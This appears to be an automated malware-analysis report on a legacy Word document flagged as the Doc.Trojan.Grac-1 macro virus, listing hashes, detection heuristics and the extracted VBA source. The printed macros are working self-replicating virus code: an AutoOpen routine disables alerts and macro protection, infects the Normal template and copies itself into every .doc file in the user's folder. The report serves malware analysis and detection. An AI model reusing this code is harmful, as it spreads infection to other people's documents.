Office (OLE) malware analysis — malicious · afee17544cb0d37f

MALICIOUS

Office (OLE)

53.0 KB Created: 2002-04-16 20:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 85c3614abcbaf50eac58dc72c6a4eb2f SHA-1: 73b7a23896b3d3f26ca3210fea50d9484d2920b3 SHA-256: afee17544cb0d37fb6ccba2aa2182e92b87a2d68bd338cfea6d0c017b6fc9833

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically an AutoOpen subroutine. This suggests the file is intended to execute malicious code automatically when opened, likely to download or execute further payloads. The ClamAV detection name 'Doc.Trojan.Grac-1' further supports its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Grac-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Grac-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5408 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5408 bytes
SHA-256: `11369ad51840c63a0185ee43a39a358487d033a74ed64ae8ab55fa3de3f2a545`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "fotografia" Attribute VB_Base = "0{245D3E4D-6D03-4468-9A54-CF9348C0BE28}{E6D2B68F-53E3-42EA-854C-ACF2A60F0878}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single) mover End Sub Private Sub UserForm_Terminate() fotografia.Caption = "Soy toda tuya!" fotografia.Show End Sub Sub mover() fotografia.Top = Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 fotografia.Left = Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + _ Rnd * 100 + Rnd * 100 + Rnd * 50 End Sub Attribute VB_Name = "graciela" Dim cheleado As Boolean, architmp As String Sub AutoOpen() On Error Resume Next desactivar_todo no_me_veras_ok copiar_me cerrar_plantilla mostrar_graciela End Sub Sub desactivar_todo() On Error Resume Next Application.EnableCancelKey = 0 Application.DisplayAlerts = 0 WordBasic.DisableAutoMacros False End Sub Sub copiar_me() On Error Resume Next Dim ya As Boolean, dirtmp As String dirtmp = Options.DefaultFilePath(0) architmp = ActiveDocument.FullName With Application.FileSearch .NewSearch .LookIn = Options.DefaultFilePath(8) .FileName = "graciela.src" .MatchTextExactly = False If .Execute > 0 Then For i = 1 To .FoundFiles.Count ya = True Next i End If End With If ya = False Then With ActiveDocument .SaveAs FileName:=Options.DefaultFilePath(8) & "\graciela.src", _ FileFormat:=wdFormatTemplate, _ AddToRecentFiles:=False End With copiar_items (NormalTemplate.FullName) NormalTemplate.Save reproducir_me (dirtmp) End If End Sub Sub reproducir_me(direc As String) On Error Resume Next With Application.FileSearch .NewSearch .LookIn = direc .SearchSubFolders = False .FileName = "*.doc" .MatchTextExactly = False .FileType = 3 If .Execute > 0 Then For i = 1 To .FoundFiles.Count If ActiveDocument.FullName <> .FoundFiles(i) Then copiar_items (.FoundFiles(i)) End If Next i End If End With End Sub Sub copiar_items(archivo As String) On Error Resume Next Dim nmak(1) As String, NT As Object Dim aSrc$ Dim aDes As Variant aDes = archivo nmak(0) = "fotografia" nmak(1) = "graciela" aSrc = Options.DefaultFilePath(8) & "\graciela.src" checar aDes If chelado = False Then fotocopiar aSrc, aDes, nmak ActiveDocument.Save End Sub Public Sub fotocopiar(Sfile, Dfile, nmak) On Error Resume Next Dim aNmak For Each aNmak In nmak On Error Resume Next Application.OrganizerCopy Sfile, Dfile, aNmak, 3 Next End Sub Sub cerrar_plantilla() On Error Resume Next If ActiveDocument.Name = "graciela.src" Then Documents.Open architmp, False, False, False, "", "", False, "", "", 0 Windows("graciela.src").Close End If End Sub Sub checar(Sfile) Dim nmak As Object, foto As Boolean, chela As Boolean cheleado = False For Each nmak In Sfile.VBProject.VBComponents If nmak.Name = "fotografia" Then foto = True If nmak.Name = "graciela" Then chela = True ... (truncated)

SHA-256: 11369ad51840c63a0185ee43a39a358487d033a74ed64ae8ab55fa3de3f2a545

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fotografia"
Attribute VB_Base = "0{245D3E4D-6D03-4468-9A54-CF9348C0BE28}{E6D2B68F-53E3-42EA-854C-ACF2A60F0878}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False









Private Sub UserForm_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
    mover
End Sub

Private Sub UserForm_Terminate()
    fotografia.Caption = "Soy toda tuya!"
    fotografia.Show
End Sub

Sub mover()
    fotografia.Top = Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100
    fotografia.Left = Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + Rnd * 100 + _
                    Rnd * 100 + Rnd * 100 + Rnd * 50
End Sub



Attribute VB_Name = "graciela"
Dim cheleado As Boolean, architmp As String

Sub AutoOpen()
    On Error Resume Next
    desactivar_todo
    no_me_veras_ok
    copiar_me
    cerrar_plantilla
    mostrar_graciela
End Sub

Sub desactivar_todo()
    On Error Resume Next
    Application.EnableCancelKey = 0
    Application.DisplayAlerts = 0
    WordBasic.DisableAutoMacros False
End Sub

Sub copiar_me()
    On Error Resume Next
    Dim ya As Boolean, dirtmp As String
    dirtmp = Options.DefaultFilePath(0)
    architmp = ActiveDocument.FullName
    With Application.FileSearch
        .NewSearch
        .LookIn = Options.DefaultFilePath(8)
        .FileName = "graciela.src"
        .MatchTextExactly = False
        If .Execute > 0 Then
            For i = 1 To .FoundFiles.Count
                    ya = True
            Next i
        End If
    End With
    If ya = False Then
        With ActiveDocument
            .SaveAs FileName:=Options.DefaultFilePath(8) & "\graciela.src", _
                            FileFormat:=wdFormatTemplate, _
                            AddToRecentFiles:=False
        End With
        copiar_items (NormalTemplate.FullName)
        NormalTemplate.Save
        reproducir_me (dirtmp)
    End If
End Sub

Sub reproducir_me(direc As String)
    On Error Resume Next
    With Application.FileSearch
        .NewSearch
        .LookIn = direc
        .SearchSubFolders = False
        .FileName = "*.doc"
        .MatchTextExactly = False
        .FileType = 3
        If .Execute > 0 Then
            For i = 1 To .FoundFiles.Count
                If ActiveDocument.FullName <> .FoundFiles(i) Then
                    copiar_items (.FoundFiles(i))
                End If
            Next i
        End If
    End With
End Sub

Sub copiar_items(archivo As String)
    On Error Resume Next
    Dim nmak(1) As String, NT As Object
    Dim aSrc$
    Dim aDes As Variant
    aDes = archivo
    nmak(0) = "fotografia"
    nmak(1) = "graciela"
    aSrc = Options.DefaultFilePath(8) & "\graciela.src"
    checar aDes
    If chelado = False Then fotocopiar aSrc, aDes, nmak
    ActiveDocument.Save
End Sub

Public Sub fotocopiar(Sfile, Dfile, nmak)
    On Error Resume Next
    Dim aNmak
    For Each aNmak In nmak
        On Error Resume Next
        Application.OrganizerCopy Sfile, Dfile, aNmak, 3
    Next
End Sub

Sub cerrar_plantilla()
    On Error Resume Next
    If ActiveDocument.Name = "graciela.src" Then
        Documents.Open architmp, False, False, False, "", "", False, "", "", 0
        Windows("graciela.src").Close
    End If
End Sub

Sub checar(Sfile)
    Dim nmak As Object, foto As Boolean, chela As Boolean
    cheleado = False
    For Each nmak In Sfile.VBProject.VBComponents
        If nmak.Name = "fotografia" Then foto = True
        If nmak.Name = "graciela" Then chela = True
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.